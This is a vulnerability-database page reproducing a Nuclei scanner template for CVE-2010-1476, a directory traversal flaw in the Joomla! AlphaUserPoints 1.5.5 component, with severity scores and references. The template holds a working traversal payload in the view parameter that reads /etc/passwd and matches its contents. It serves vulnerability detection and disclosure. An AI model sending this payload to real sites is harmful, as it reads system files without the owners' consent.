Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1476
HistorySep 04, 2021 - 3:35 a.m.

Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion

2021-09-0403:35:49
ProjectDiscovery
github.com
2

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.035 Low

EPSS

Percentile

91.6%

A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the view parameter to index.php.

id: CVE-2010-1476

info:
  name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12150
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1476
    - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
    - http://www.alphaplug.com/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1476
    cwe-id: CWE-22
    epss-score: 0.03527
    epss-percentile: 0.91571
    cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: alphaplug
    product: com_alphauserpoints
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220531dcb18e8f2b71dbb39f860cc4850ffd43574870cced6d1c14fa79a91dcc92b022100b113da3738595c7563a2e04bdecc3d3e47efe77caef58b89fd6e5f8a590a5fcf:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.035 Low

EPSS

Percentile

91.6%

Related for NUCLEI:CVE-2010-1476